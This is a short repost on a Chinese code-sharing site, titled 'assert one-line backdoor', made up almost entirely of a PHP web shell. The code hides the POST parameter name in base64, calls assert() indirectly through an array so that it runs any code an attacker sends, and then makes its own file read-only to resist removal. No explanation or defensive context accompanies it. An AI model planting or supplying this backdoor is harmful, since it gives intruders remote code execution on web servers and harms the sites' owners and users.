码迷,mamicode.com
首页 > 其他好文 > 详细

assert一句话后门

时间:2020-05-15 13:29:09      阅读:159      评论:0      收藏:0      [点我收藏+]

标签:chm   func   style   serve   server   post   assert   color   else   

<?php $p=base64_decode("bW93YW5n");$i[‘j‘]=‘assert‘;$a[]=$i;@$a[0][‘j‘]($_POST[$p]);$filename = $php_self=substr($_SERVER[‘PHP_SELF‘],strrpos($_SERVER[‘PHP_SELF‘],‘/‘)+1);function set_writeable($file_name){if(@chmod($file_name,0444)){echo "OK";}else{echo "no";}}set_writeable($filename);?>

 

assert一句话后门

标签:chm   func   style   serve   server   post   assert   color   else   

原文地址:https://www.cnblogs.com/phpyangbo/p/12894061.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!